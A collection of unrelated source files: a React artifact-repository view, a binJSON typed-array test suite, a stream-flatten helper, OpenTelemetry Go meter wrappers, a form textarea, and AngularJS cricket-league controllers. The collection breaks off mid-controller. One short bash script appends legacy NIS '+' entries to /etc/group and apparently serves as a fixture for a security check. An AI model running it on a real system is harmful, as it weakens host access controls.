          key={`repository-item-${index}`}
          artifact={pkg}
          expanded={expanded}
          index={index}
          onEdit={(id, description) => self._editArtifactData(id, description)}
          onRowSelection={() => self._onRowSelection(pkg)}
          // this will be run after expansion + collapse and both need some time to fully settle
          // otherwise the measurements are off
          onExpanded={() => setTimeout(() => self.setState({}), 500)}
          release={release}
          ref={ref => (this.repoItemAnchor = ref)}
        />
      );
    });
    const dropzoneClass = uploading ? 'dropzone disabled muted' : 'dropzone';
    // We need the ref to the <a> element that refers to the deployments tab, in order to align
    // the helptip with the button - unfortunately this is not forwarded through react-router or mui
    // thus, use the following component as a workaround:
    const ForwardingLink = React.forwardRef((props, ref) => <Link {...props} innerRef={ref} />);
    ForwardingLink.displayName = 'ForwardingLink';
    // Onboarding tooltips are positioned off the DOM geometry of the last
    // rendered repo item and the "create deployment" button.
    let onboardingComponent = null;
    let uploadArtifactOnboardingComponent = null;
    if (this.repoItemAnchor && this.creationRef) {
      const element = this.repoItemAnchor.itemRef;
      const anchor = { left: element.offsetLeft + element.offsetWidth / 3, top: element.offsetTop + element.offsetHeight };
      const artifactIncludedAnchor = {
        left: this.creationRef.offsetLeft + this.creationRef.offsetWidth,
        top: this.creationRef.offsetTop + this.creationRef.offsetHeight / 2
      };
      const artifactUploadedAnchor = {
        left: this.creationRef.offsetLeft + this.creationRef.offsetWidth / 2,
        top: this.creationRef.offsetTop - this.creationRef.offsetHeight / 2
      };
      onboardingComponent = getOnboardingComponentFor('artifact-included-onboarding', { anchor });
      onboardingComponent = getOnboardingComponentFor(
        'artifact-included-deploy-onboarding',
        { place: 'right', anchor: artifactIncludedAnchor },
        onboardingComponent
      );
      onboardingComponent = getOnboardingComponentFor('deployments-past-completed', { anchor }, onboardingComponent);
      onboardingComponent = getOnboardingComponentFor('artifact-modified-onboarding', { anchor: artifactUploadedAnchor, place: 'bottom' }, onboardingComponent);
    }
    if (this.dropzoneRef) {
      const dropzoneAnchor = { left: this.dropzoneRef.offsetLeft, top: this.dropzoneRef.offsetTop + this.dropzoneRef.offsetHeight };
      uploadArtifactOnboardingComponent = getOnboardingComponentFor('upload-prepared-artifact-tip', { anchor: dropzoneAnchor, place: 'left' });
    }
    return loading || wasSelectedRecently ? (
      <div className="flexbox centered" style={{ width: '100%', height: '50%' }}>
        <Loader show={true} />
      </div>
    ) : (
      <div className="relative release-repo margin-left" style={{ width: '100%' }}>
        <div className="muted margin-bottom">
          <Typography variant="body1" style={{ marginBottom: 10 }}>
            Release:
          </Typography>
          <Typography variant="body2">{release ? release.Name : 'No release selected'}</Typography>
        </div>
        {!!release && (
          <Typography variant="body1" style={{ fontWeight: 'bold' }}>
            Artifacts in this Release:
          </Typography>
        )}
        {uploadArtifactOnboardingComponent ? uploadArtifactOnboardingComponent : null}
        <Loader show={loading} />
        <div style={{ position: 'relative', marginTop: '10px' }}>
          {items.length ? (
            <div>
              <div className="release-repo-item repo-item repo-header">
                {columnHeaders.map(item => (
                  <Tooltip key={item.name} className="columnHeader" title={item.title} placement="top-start" onClick={() => self._sortColumn(item)}>
                    <div>
                      {item.title}
                      {item.sortable ? (
                        <SortIcon className={`sortIcon ${self.state.sortCol === item.name ? 'selected' : ''} ${self.state.sortDown.toString()}`} />
                      ) : null}
                    </div>
                  </Tooltip>
                ))}
                <div style={{ width: 48 }} />
              </div>
              {items}
              <Button
                color="primary"
                variant="contained"
                buttonRef={ref => (this.creationRef = ref)}
                component={ForwardingLink}
                to={`/deployments?open=true&release=${release.Name}`}
                style={{ marginLeft: 20 }}
                onClick={() => self.onCreateDeploymentFrom(release)}
              >
                Create deployment with this release
              </Button>
            </div>
          ) : null}
          {showHelptips && onboardingComponent ? onboardingComponent : null}
          {showHelptips && items.length ? (
            <div>
              <div id="onboard-10" className="tooltip help" data-tip data-for="artifact-expand-tip" data-event="click focus">
                <HelpIcon />
              </div>
              <ReactTooltip id="artifact-expand-tip" globalEventOff="click" place="bottom" type="light" effect="solid" className="react-tooltip">
                <ExpandArtifact />
              </ReactTooltip>
            </div>
          ) : null}
          {items.length || loading ? null : (
            <div className="dashboard-placeholder fadeIn" style={{ fontSize: '16px', margin: '8vh auto' }}>
              {releases.length > 0 ? (
                <p>Select a Release on the left to view its Artifact details</p>
              ) : (
                <Dropzone
                  activeClassName="active"
                  disabled={uploading}
                  multiple={false}
                  noClick={true}
                  onDrop={(accepted, rejected) => self.onDrop(accepted, rejected)}
                  rejectClassName="active"
                >
                  {({ getRootProps, getInputProps }) => (
                    <div {...getRootProps({ className: dropzoneClass })} onClick={() => onUpload()} ref={ref => (self.dropzoneRef = ref)}>
                      <input {...getInputProps()} disabled={uploading} />
                      <p>
                        There are no Releases yet. <a>Upload an Artifact</a> to create a new Release
                      </p>
                    </div>
                  )}
                </Dropzone>
              )}
            </div>
          )}
        </div>
      </div>
    );
  }
}
// Redux actions bound into the component's props.
const actionCreators = { editArtifact, uploadArtifact, selectArtifact, setSnackbar, selectRelease };
// Derive the component's data props from the store: the selected release,
// all known releases, selection state, and UI flags.
const mapStateToProps = state => {
  return {
    onboardingComplete: state.users.onboarding.complete,
    release: state.releases.selectedRelease ? state.releases.byId[state.releases.selectedRelease] : null,
    releases: Object.values(state.releases.byId),
    selectedArtifact: state.releases.selectedArtifact,
    showHelptips: state.users.showHelptips,
    uploading: state.releases.uploading
  };
};
export default connect(mapStateToProps, actionCreators)(ReleaseRepository);
|
#!/usr/bin/env mocha -R spec
import {strict as assert} from "assert";
import {binJSON} from "../";
// Suite title derived from this file's name.
const TITLE = __filename.split("/").pop();
// Per-element transform used when filling typed arrays (e.g. BigInt
// conversion for the 64-bit array flavours).
type Filter = (num: number) => any;
/**
 * Render a byte sequence as an uppercase, dash-separated hex string,
 * e.g. [10, 11] -> "0A-0B". ArrayBufferViews are read byte-by-byte via a
 * Uint8Array over their underlying buffer.
 */
const toHex = (obj: ArrayBufferView | number[]) => {
    let bytes: number[];
    if (ArrayBuffer.isView(obj)) {
        bytes = Array.from(new Uint8Array(obj.buffer, obj.byteOffset, obj.byteLength));
    } else {
        bytes = obj;
    }
    // (0x100 | v) guarantees a two-digit slice after dropping the leading "1".
    return bytes.map(v => (0x100 | v).toString(16).substring(1)).join("-").toUpperCase();
};
// Constructor shape shared by all TypedArray classes under test.
interface Fn {
  new(length: number): ArrayBufferView;
}
describe(TITLE, () => {
    it("handlers.Uint8Array", () => {
        // Fix: the original called assert(actual, expected) -- the second
        // argument of assert() is only a failure message, so the comparison
        // never happened. Compare explicitly (toHex emits uppercase).
        assert.strictEqual(toHex([10, 11, 12, 13, 14, 15]), "0A-0B-0C-0D-0E-0F");
        const data = new Uint8Array([0x24, 0xe6, 0xed, 0x42, 0xfd, 2, 0, 0, 0, 4, 0x41, 0x42, 0x43, 0x44]);
        const decoded = binJSON.decode(data);
        assert.equal(decoded instanceof Uint8Array, true);
        assert.deepEqual(toHex(decoded), "41-42-43-44");
    });
    it("handlers.Uint32Array", () => {
        const data = new Uint8Array([0x24, 0xf9, 0x8d, 0xfe, 0x49, 2, 0, 0, 0, 4, 0x41, 0x42, 0x43, 0x44]);
        const decoded = binJSON.decode(data);
        assert.equal(decoded instanceof Uint32Array, true);
        assert.deepEqual(toHex(decoded), "41-42-43-44");
    });
    // Round-trip every TypedArray flavour through encode/decode.
    test("Int8Array", Int8Array);
    test("Uint8Array", Uint8Array);
    test("Uint8ClampedArray", Uint8ClampedArray);
    test("Int16Array", Int16Array);
    test("Uint16Array", Uint16Array);
    test("Int32Array", Int32Array);
    test("Uint32Array", Uint32Array);
    test("Float32Array", Float32Array);
    test("Float64Array", Float64Array);
    // 64-bit arrays need BigInt elements and are skipped on runtimes without them.
    const toBigInt = ("undefined" !== typeof BigInt) ? BigInt : null;
    test("BigInt64Array", ("undefined" !== typeof BigInt64Array) ? BigInt64Array : null, toBigInt);
    test("BigUint64Array", ("undefined" !== typeof BigUint64Array) ? BigUint64Array : null, toBigInt);
    it("DataView", () => {
        [0, 10, 100, 1000].forEach(size => {
            const u8 = new Uint8Array(size);
            for (let i = 0; i < size; i++) u8[i] = i;
            const data = new DataView(u8.buffer, u8.byteOffset, u8.byteLength);
            const decoded = binJSON.decode(binJSON.encode(data));
            assert.equal(decoded?.constructor?.name, data.constructor.name);
            assert.equal(toHex(decoded), toHex(data));
        });
    });
    it("TypedArray[]", () => {
        const data = [
            new Int8Array([1]),
            new Uint8Array([2]),
            new Uint8ClampedArray([3]),
            new Int16Array([4]),
            new Uint16Array([5]),
            new Int32Array([6]),
            new Uint32Array([7]),
            new Float32Array([8]),
            new Float64Array([9]),
        ];
        const encoded = binJSON.encode(data);
        const decoded = binJSON.decode(encoded);
        assert.equal(decoded.length, data.length);
        for (let i = 0; i < decoded.length; i++) {
            assert.deepEqual(toHex(decoded[i]), toHex(data[i]));
        }
    });
    /**
     * Shared round-trip test: fill an instance of `fn` (optionally mapping
     * each index through `filter`), encode + decode it, and check the type,
     * length, and bytes survive. A null `fn` registers a skipped test.
     */
    function test(title: string, fn: Fn, filter?: Filter) {
        const IT = fn ? it : it.skip;
        if (!filter) filter = (v => v);
        IT(title, () => {
            [0, 1, 10, 10000].forEach(size => {
                const data = new fn(size) as any as number[];
                assert.equal(data.length, size);
                for (let i = 0; i < size; i++) data[i] = filter(i);
                const decoded = binJSON.decode(binJSON.encode(data));
                assert.equal(decoded instanceof fn, true, decoded?.constructor?.name);
                assert.equal(decoded?.length, size);
                assert.equal(toHex(decoded), toHex(data));
            });
        });
    }
});
|
<filename>src/flatten.js
// @flow
import type { ReadableStreamController } from "./streams";
import { ReadableStream, WritableStream } from "./streams";
import { zipWith } from "./utils";
/**
* This function takes one or more streams and returns a readable combining
* the streams, returning chunks as they arrive in combined streams.
*
* @example
* let r1 = createReadable([1,2,3]),
* r2 = createReadable([4,5,6]),
* writable = createWritable(),
* flattened = flatten(r1,r2);
*
* flattened.pipeTo( writable ); // 1,4,2,5,3,6 (order depends on order received so may vary)
*/
export default function flatten(...streams: Array<ReadableStream>): ReadableStream {
  let
    flattenedStream: ReadableStream,
    writers: Array<WritableStream> = [];
  return flattenedStream = new ReadableStream({
    start (controller: ReadableStreamController): Promise<mixed> {
      // Create writers for each stream; each writer forwards whatever it
      // receives straight into the flattened stream's controller.
      while ( writers.length < streams.length )
        writers.push( new WritableStream({
          // write incoming to flattenedStream
          write: controller.enqueue.bind( controller )
        })
      );
      // Connect streams to writers (pairwise, via zipWith).
      let
        connect: (ReadableStream, WritableStream) => Promise<mixed> =
          (r, w) => r.pipeTo( w ),
        pipedAll: Array<Promise<mixed>>;
      try {
        pipedAll = zipWith( connect, streams, writers );
      } catch (e) {
        // NOTE(review): any zipWith failure is reported as a non-readable
        // input; the original error is discarded -- confirm this is intended.
        throw new Error("Only readable streams can be flattened.");
      }
      // Set up closing: close the flattened stream once every input has
      // drained, or propagate the first error.
      return Promise.all( pipedAll ).then(
        controller.close.bind( controller ),
        controller.error.bind( controller )
      );
    },
    cancel (): void {
      // If cancelled, cancel all streams
      streams.forEach( stream => stream.cancel() );
    }
  });
};
// Browserify compat
if ( typeof module !== "undefined" )
  // $FlowFixMe
  module.exports = flatten;
|
// Copyright The OpenTelemetry Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package sdkapi // import "go.opentelemetry.io/otel/sdk/metric/sdkapi"
import (
"context"
"go.opentelemetry.io/otel/attribute"
"go.opentelemetry.io/otel/metric"
"go.opentelemetry.io/otel/metric/instrument"
"go.opentelemetry.io/otel/metric/instrument/asyncfloat64"
"go.opentelemetry.io/otel/metric/instrument/asyncint64"
"go.opentelemetry.io/otel/metric/instrument/syncfloat64"
"go.opentelemetry.io/otel/metric/instrument/syncint64"
"go.opentelemetry.io/otel/sdk/metric/number"
)
type (
	// meter adapts a MeterImpl to the metric.Meter interface.
	meter struct{ MeterImpl }

	// Per-instrument-family provider views over meter:
	// s*/a* = sync/async, f/i = float64/int64.
	sfMeter struct{ meter }
	siMeter struct{ meter }
	afMeter struct{ meter }
	aiMeter struct{ meter }

	// Wrappers that expose the concrete instrument APIs on top of the
	// underlying SyncImpl/AsyncImpl.
	iAdder    struct{ SyncImpl }
	fAdder    struct{ SyncImpl }
	iRecorder struct{ SyncImpl }
	fRecorder struct{ SyncImpl }
	iObserver struct{ AsyncImpl }
	fObserver struct{ AsyncImpl }
)
// WrapMeterImpl wraps impl in a type that implements the metric.Meter API.
func WrapMeterImpl(impl MeterImpl) metric.Meter {
	return meter{impl}
}
// UnwrapMeterImpl returns the MeterImpl that WrapMeterImpl wrapped, or nil
// when m is not such a wrapper.
func UnwrapMeterImpl(m metric.Meter) MeterImpl {
	if wrapped, ok := m.(meter); ok {
		return wrapped.MeterImpl
	}
	return nil
}
// AsyncFloat64 returns the asynchronous float64 instrument provider.
func (m meter) AsyncFloat64() asyncfloat64.InstrumentProvider {
	return afMeter{m}
}

// AsyncInt64 returns the asynchronous int64 instrument provider.
func (m meter) AsyncInt64() asyncint64.InstrumentProvider {
	return aiMeter{m}
}

// SyncFloat64 returns the synchronous float64 instrument provider.
func (m meter) SyncFloat64() syncfloat64.InstrumentProvider {
	return sfMeter{m}
}

// SyncInt64 returns the synchronous int64 instrument provider.
func (m meter) SyncInt64() syncint64.InstrumentProvider {
	return siMeter{m}
}

// RegisterCallback forwards asynchronous-instrument callback registration
// to the wrapped implementation.
func (m meter) RegisterCallback(insts []instrument.Asynchronous, cb func(ctx context.Context)) error {
	return m.MeterImpl.RegisterCallback(insts, cb)
}
func (m meter) newSync(name string, ikind InstrumentKind, nkind number.Kind, opts []instrument.Option) (SyncImpl, error) {
cfg := instrument.NewConfig(opts...)
return m.NewSyncInstrument(NewDescriptor(name, ikind, nkind, cfg.Description(), cfg.Unit()))
}
func (m meter) newAsync(name string, ikind InstrumentKind, nkind number.Kind, opts []instrument.Option) (AsyncImpl, error) {
cfg := instrument.NewConfig(opts...)
return m.NewAsyncInstrument(NewDescriptor(name, ikind, nkind, cfg.Description(), cfg.Unit()))
}
// Counter creates an asynchronous float64 counter observer.
// Note: the wrapper is returned even when err is non-nil; a nil inst makes
// Observe a no-op (see fObserver.Observe below).
func (m afMeter) Counter(name string, opts ...instrument.Option) (asyncfloat64.Counter, error) {
	inst, err := m.newAsync(name, CounterObserverInstrumentKind, number.Float64Kind, opts)
	return fObserver{inst}, err
}

// UpDownCounter creates an asynchronous float64 up-down counter observer.
func (m afMeter) UpDownCounter(name string, opts ...instrument.Option) (asyncfloat64.UpDownCounter, error) {
	inst, err := m.newAsync(name, UpDownCounterObserverInstrumentKind, number.Float64Kind, opts)
	return fObserver{inst}, err
}

// Gauge creates an asynchronous float64 gauge observer.
func (m afMeter) Gauge(name string, opts ...instrument.Option) (asyncfloat64.Gauge, error) {
	inst, err := m.newAsync(name, GaugeObserverInstrumentKind, number.Float64Kind, opts)
	return fObserver{inst}, err
}

// Counter creates an asynchronous int64 counter observer.
func (m aiMeter) Counter(name string, opts ...instrument.Option) (asyncint64.Counter, error) {
	inst, err := m.newAsync(name, CounterObserverInstrumentKind, number.Int64Kind, opts)
	return iObserver{inst}, err
}

// UpDownCounter creates an asynchronous int64 up-down counter observer.
func (m aiMeter) UpDownCounter(name string, opts ...instrument.Option) (asyncint64.UpDownCounter, error) {
	inst, err := m.newAsync(name, UpDownCounterObserverInstrumentKind, number.Int64Kind, opts)
	return iObserver{inst}, err
}

// Gauge creates an asynchronous int64 gauge observer.
func (m aiMeter) Gauge(name string, opts ...instrument.Option) (asyncint64.Gauge, error) {
	inst, err := m.newAsync(name, GaugeObserverInstrumentKind, number.Int64Kind, opts)
	return iObserver{inst}, err
}
// Counter creates a synchronous float64 counter.
// Note: the wrapper is returned even when err is non-nil; a nil inst makes
// Add/Record a no-op (see the adder/recorder methods below).
func (m sfMeter) Counter(name string, opts ...instrument.Option) (syncfloat64.Counter, error) {
	inst, err := m.newSync(name, CounterInstrumentKind, number.Float64Kind, opts)
	return fAdder{inst}, err
}

// UpDownCounter creates a synchronous float64 up-down counter.
func (m sfMeter) UpDownCounter(name string, opts ...instrument.Option) (syncfloat64.UpDownCounter, error) {
	inst, err := m.newSync(name, UpDownCounterInstrumentKind, number.Float64Kind, opts)
	return fAdder{inst}, err
}

// Histogram creates a synchronous float64 histogram.
func (m sfMeter) Histogram(name string, opts ...instrument.Option) (syncfloat64.Histogram, error) {
	inst, err := m.newSync(name, HistogramInstrumentKind, number.Float64Kind, opts)
	return fRecorder{inst}, err
}

// Counter creates a synchronous int64 counter.
func (m siMeter) Counter(name string, opts ...instrument.Option) (syncint64.Counter, error) {
	inst, err := m.newSync(name, CounterInstrumentKind, number.Int64Kind, opts)
	return iAdder{inst}, err
}

// UpDownCounter creates a synchronous int64 up-down counter.
func (m siMeter) UpDownCounter(name string, opts ...instrument.Option) (syncint64.UpDownCounter, error) {
	inst, err := m.newSync(name, UpDownCounterInstrumentKind, number.Int64Kind, opts)
	return iAdder{inst}, err
}

// Histogram creates a synchronous int64 histogram.
func (m siMeter) Histogram(name string, opts ...instrument.Option) (syncint64.Histogram, error) {
	inst, err := m.newSync(name, HistogramInstrumentKind, number.Int64Kind, opts)
	return iRecorder{inst}, err
}
// Add records a float64 counter increment. The nil check makes an
// instrument whose creation failed (nil SyncImpl) a safe no-op.
func (a fAdder) Add(ctx context.Context, value float64, attrs ...attribute.KeyValue) {
	if a.SyncImpl != nil {
		a.SyncImpl.RecordOne(ctx, number.NewFloat64Number(value), attrs)
	}
}

// Add records an int64 counter increment; no-op when SyncImpl is nil.
func (a iAdder) Add(ctx context.Context, value int64, attrs ...attribute.KeyValue) {
	if a.SyncImpl != nil {
		a.SyncImpl.RecordOne(ctx, number.NewInt64Number(value), attrs)
	}
}

// Record records a float64 histogram value; no-op when SyncImpl is nil.
func (a fRecorder) Record(ctx context.Context, value float64, attrs ...attribute.KeyValue) {
	if a.SyncImpl != nil {
		a.SyncImpl.RecordOne(ctx, number.NewFloat64Number(value), attrs)
	}
}

// Record records an int64 histogram value; no-op when SyncImpl is nil.
func (a iRecorder) Record(ctx context.Context, value int64, attrs ...attribute.KeyValue) {
	if a.SyncImpl != nil {
		a.SyncImpl.RecordOne(ctx, number.NewInt64Number(value), attrs)
	}
}

// Observe records a float64 asynchronous observation; no-op when AsyncImpl is nil.
func (a fObserver) Observe(ctx context.Context, value float64, attrs ...attribute.KeyValue) {
	if a.AsyncImpl != nil {
		a.AsyncImpl.ObserveOne(ctx, number.NewFloat64Number(value), attrs)
	}
}

// Observe records an int64 asynchronous observation; no-op when AsyncImpl is nil.
func (a iObserver) Observe(ctx context.Context, value int64, attrs ...attribute.KeyValue) {
	if a.AsyncImpl != nil {
		a.AsyncImpl.ObserveOne(ctx, number.NewInt64Number(value), attrs)
	}
}
|
#!/bin/bash
# Append NIS/compat ('+') entries to /etc/group. Requires root; the
# appended lines are identical to the original three echo statements.
{
	printf '%s\n' '+name'
	printf '%s\n' '+'
	printf '%s\n' '+@group'
} >> /etc/group
|
import React from "react";
export const CustomTextarea: React.FC<CustomTextareaProps> = ({
field,
form: { touched, errors },
label,
...props
}) => (
<div className="input-group">
{touched[field.name] && errors[field.name] ? (
<span className="label-input label-error">{errors[field.name]}</span>
) : (
<label className="label-input" htmlFor={field.name}>
{label}
</label>
)}
<textarea
cols={30}
rows={4}
id={field.name}
className={`input-form ${touched[field.name] && errors[field.name] && "input-error"}`}
{...field}
{...props}
name={field.name}
/>
</div>
);
type CustomTextareaProps = {
label: string;
field: { name: string };
form: { touched: Record<string, string[]>; errors: Record<string, string[]> };
};
|
<filename>src/main/resources/META-INF/resources/js/cric_controllers.js
'use strict';
/* Controllers */
/**
 * "My Leagues" view. Loads every cricket league visible to the user and
 * buckets it into Registered / Pending / Cancelled / Owned tabs based on
 * the logged-in user's membership status (Session.login).
 */
envyLeagueApp.controller('CricMyLeaguesController', function ($scope, $cookies, $location, Session, CricketLeague) {
  $scope.error = null;
  $scope.errorMessage = null;
  $scope.updateVisible = true;
  //Ordering is important, used in template view
  $scope.tabs = [
    {
      name: 'Registered',
      disabled: false,
      hidden:false
    },
    {
      name: 'Pending',
      disabled: false,
      hidden:false
    },
    {
      name: 'Cancelled',
      disabled: false,
      hidden:false
    },
    {
      name: 'Owned',
      disabled: false,
      hidden:false
    },
  ];
  $scope.activeTab = $scope.tabs[0].name;
  $scope.setActive = function(data) {
    $scope.activeTab = data;
  };
  // Fetch all leagues, then partition them into per-tab lists.
  CricketLeague.query({},
    function(data, responseHeaders) {
      $scope.leagues = data;
      $scope.ownedLeagues = [];
      $scope.registeredLeagues = [];
      $scope.pendingLeagues = [];
      $scope.cancelledLeagues = [];
      for (var i=0; i<$scope.leagues.length; i++) {
        // Leagues owned by the current user.
        if (angular.equals($scope.leagues[i].owner.login,Session.login)) {
          $scope.ownedLeagues.push($scope.leagues[i]);
        }
        // Only ACTIVE leagues are scanned for the user's own membership row.
        if (angular.equals($scope.leagues[i].status,'ACTIVE')) {
          for (var j=0; j<$scope.leagues[i].players.length; j++) {
            if (angular.equals($scope.leagues[i].players[j].user,Session.login)) {
              //Found logged in user one
              if (angular.equals($scope.leagues[i].players[j].status,'ACTIVE')) {
                $scope.registeredLeagues.push($scope.leagues[i]);
              } else if (angular.equals($scope.leagues[i].players[j].status,'PENDING')) {
                $scope.pendingLeagues.push($scope.leagues[i]);
              } else if (angular.equals($scope.leagues[i].players[j].status,'CANCELLED')) {
                $scope.cancelledLeagues.push($scope.leagues[i]);
              }
            }
          }
        }
      }
      // Hide tabs that would be empty (Registered tab always stays visible).
      if ($scope.pendingLeagues.length == 0) {
        $scope.tabs[1].disabled = true;
        $scope.tabs[1].hidden = true;
      }
      if ($scope.cancelledLeagues.length == 0) {
        $scope.tabs[2].disabled = true;
        $scope.tabs[2].hidden = true;
      }
      if ($scope.ownedLeagues.length == 0) {
        $scope.tabs[3].disabled = true;
        $scope.tabs[3].hidden = true;
      }
    },
    function(httpResponse) {
      $scope.error = "ERROR";
      $scope.errorMessage = httpResponse.data.message;
    }
  );
  // Navigation helpers: remember the chosen league in a cookie, then route
  // (replace() avoids adding a history entry).
  $scope.updatePredictions = function(data) {
    $cookies.preferredLeague = data.name;
    $location.path('/cricket/predictions').replace();
  };
  $scope.viewPerformance = function(data) {
    $cookies.preferredLeague = data.name;
    $location.path('/cricket/performance').replace();
  };
  $scope.viewLeaderBoard = function(data) {
    $cookies.preferredLeague = data.name;
    $location.path('/cricket/leaders').replace();
  };
  $scope.manageLeague = function(data) {
    $cookies.preferredLeague = data.name;
    $location.path('/cricket/manageLeague').replace();
  }
});
/**
 * League management view for league owners: loads the league selected via
 * the preferredLeague cookie and saves edits back to the server.
 */
envyLeagueApp.controller('CricManageLeagueController', function($scope, $cookies, CricketLeague) {
  $scope.error = null;
  $scope.errorMessage = null;
  // Gates the update button while a save is in flight.
  $scope.updateVisible = true;
  CricketLeague.query({owned:'true', league:$cookies.preferredLeague},
    function(data, responseHeaders) {
      $scope.leagues = data;
    },
    function(httpResponse) {
      $scope.error = "ERROR";
      $scope.errorMessage = httpResponse.data.message;
    }
  );
  // Persist edits; the button is re-enabled on both success and failure.
  $scope.update = function(data) {
    $scope.updateVisible = false;
    $scope.error = null;
    $scope.errorMessage = null;
    CricketLeague.save(data,
      function(data, responseHeaders) {
        $scope.updateVisible = true;
      },
      function(httpResponse) {
        $scope.updateVisible = true;
        $scope.error = "ERROR";
        $scope.errorMessage = httpResponse.data.message;
      }
    );
  };
});
/**
 * Predictions view: loads the user's active leagues, resolves the selected
 * league from the preferredLeague cookie, loads future matches with the
 * user's predictions, and opens a modal for editing a prediction.
 */
envyLeagueApp.controller('CricPredictionController',
  function ($scope, $cookies, CricketPrediction, CricketUserLeague, CricketMatch, $filter, $modal) {
    $scope.error = null;
    // For each match, pick out the single prediction belonging to the
    // currently selected league (or an empty object when there is none).
    $scope.changeLeague = function() {
      $cookies.preferredLeague = $scope.selectedLeague;
      for (var i=0;i<$scope.matches.length;i++) {
        var selectedPredictions = $filter('filter')($scope.matches[i].predictions, {league:$scope.selectedLeague});
        if (angular.isArray(selectedPredictions) && selectedPredictions.length==1) {
          $scope.matches[i].prediction = selectedPredictions[0];
        } else {
          $scope.matches[i].prediction = {};
        }
      }
    }
    CricketUserLeague.query({},
      function(data, responseHeaders) {
        $scope.error = null;
        $scope.errorMessage = null;
        $scope.leagues = $filter('filter')(data, {userLeague: {status: 'ACTIVE'}});
        // NOTE(review): compares against the string 'undefined' — cookie
        // values are strings; confirm this matches how the cookie is unset.
        if ($cookies.preferredLeague == 'undefined') {
          // NOTE(review): '> 1' looks inconsistent with the '> 0' check in
          // CricLeadersController — confirm intent.
          if ($scope.leagues.length > 1) {
            $cookies.preferredLeague = $scope.leagues[0].name;
            $scope.selectedLeague = $cookies.preferredLeague;
          }
        } else {
          // Select the cookie's league if the user still belongs to it;
          // otherwise fall back to the first league.
          for (var i=0;i<$scope.leagues.length; i++) {
            if ($scope.leagues[i].name == $cookies.preferredLeague) {
              $scope.selectedLeague = $cookies.preferredLeague;
              break;
            }
          }
          if ($scope.selectedLeague == undefined && $scope.leagues.length > 0) {
            $cookies.preferredLeague = $scope.leagues[0].name;
            $scope.selectedLeague = $cookies.preferredLeague;
          }
        }
        // Only after the league is resolved, load upcoming matches along
        // with the user's predictions and build the winner options list.
        CricketMatch.query({predictions:'true', future:'true'},
          function(data, responseHeaders) {
            $scope.matches = data;
            for (var i=0;i<$scope.matches.length;i++) {
              $scope.matches[i].winnerOptions= [
                {value:$scope.matches[i].teamA,display:$scope.matches[i].teamA + ' Winner'},
                {value:"Draw",display:"Draw"},
                {value:$scope.matches[i].teamB,display:$scope.matches[i].teamB + ' Winner'}
              ];
            }
            $scope.changeLeague();//Just to set the prediction object on match correct.
          },
          function(httpResponse) {
            $scope.error = "ERROR";
            $scope.errorMessage = httpResponse.data.message;
          }
        );
      },
      function(httpResponse) {
        $scope.error = "ERROR";
        $scope.errorMessage = httpResponse.data.message;
      }
    );
    // Open the prediction modal; when it closes with a prediction, splice
    // that prediction back into the match's predictions list.
    $scope.viewPredictionModal = function(selectedMatch) {
      var modalInstance = $modal.open({
        templateUrl: 'predictionModalContent.html',
        controller: 'PredictionModalInstanceCtrl',
        size: 'lg',
        resolve: {
          match: function ()
          {return selectedMatch;},
          prediction: function ()
          {return selectedMatch.prediction;},
          league: function ()
          {return $scope.selectedLeague;}
        }
      });
      modalInstance.result.then(function (prediction) {
        // Locate the match the modal was opened for.
        var matchIndex = -1;
        for (var i=0;i<$scope.matches.length;i++) {
          if ($scope.matches[i].number==selectedMatch.number) {
            matchIndex = i;break;
          }
        }
        // Replace the existing prediction for this league, or append.
        var indexFound = -1;
        for (var i=0;i<$scope.matches[matchIndex].predictions.length; i++) {
          if ($scope.matches[matchIndex].predictions[i].league == prediction.league) {
            indexFound = i;break;
          }
        }
        if (indexFound == -1) {
          $scope.matches[matchIndex].predictions.push(prediction);
        } else {
          $scope.matches[matchIndex].predictions[indexFound] = prediction;
        }
        $scope.matches[matchIndex].prediction = prediction;
      }, function () {
        //When modal is dismissed
      });
    };
  });
/**
 * Modal controller for editing one prediction. Works on a copy of the
 * prediction so that Cancel leaves the original untouched; OK saves to the
 * server and hands the (possibly new) prediction back to the opener.
 */
envyLeagueApp.controller('PredictionModalInstanceCtrl',
  function ($scope, $modalInstance, $filter, CricketPrediction, match, prediction, league) {
    $scope.match = match;
    $scope.selectedLeague = league;
    // Copy so edits are discarded on dismiss.
    $scope.prediction = angular.copy(prediction);
    if (angular.isUndefined($scope.prediction.teamWinner)) {
      $scope.prediction.teamWinner = 'Draw';
    }
    $scope.ok = function () {
      if ($scope.prediction.match == undefined) {
        //New request
        $scope.prediction.match = $scope.match.number;
        $scope.prediction.league = $scope.selectedLeague;
      }
      // NOTE(review): the modal closes without waiting for the save to
      // succeed; a failed save only sets $scope.error on the (closing)
      // modal scope — confirm this is intended.
      CricketPrediction.save($scope.prediction,
        function(data, responseHeaders) {
        },
        function(httpResponse) {
          $scope.error = "ERROR";
          $scope.errorMessage = httpResponse.data.message;
        }
      );
      $modalInstance.close($scope.prediction);
    };
    $scope.cancel = function () {
      $modalInstance.dismiss('cancel');
    };
  }
);
/**
 * Performance view: same league-resolution flow as CricPredictionController
 * but loads PAST matches (future:'false') and shows a read-only modal.
 */
envyLeagueApp.controller('CricPerformanceController',
  function ($scope, $cookies, $modal, CricketPrediction, CricketUserLeague, CricketMatch, $filter) {
    $scope.error = null;
    // Pick the prediction matching the selected league for each match.
    $scope.changeLeague = function() {
      $cookies.preferredLeague = $scope.selectedLeague;
      for (var i=0;i<$scope.matches.length;i++) {
        var selectedPredictions = $filter('filter')($scope.matches[i].predictions, {league:$scope.selectedLeague});
        if (angular.isArray(selectedPredictions) && selectedPredictions.length==1) {
          $scope.matches[i].prediction = selectedPredictions[0];
        } else {
          $scope.matches[i].prediction = {};
        }
      }
    }
    CricketUserLeague.query({},
      function(data, responseHeaders) {
        $scope.error = null;
        $scope.errorMessage = null;
        $scope.leagues = $filter('filter')(data, {userLeague: {status: 'ACTIVE'}});
        // NOTE(review): string-compare against 'undefined', as elsewhere.
        if ($cookies.preferredLeague == 'undefined') {
          if ($scope.leagues.length > 1) {
            $cookies.preferredLeague = $scope.leagues[0].name;
            $scope.selectedLeague = $cookies.preferredLeague;
          }
        } else {
          // NOTE(review): unlike CricPredictionController this loop has no
          // 'break' — harmless but inconsistent; confirm.
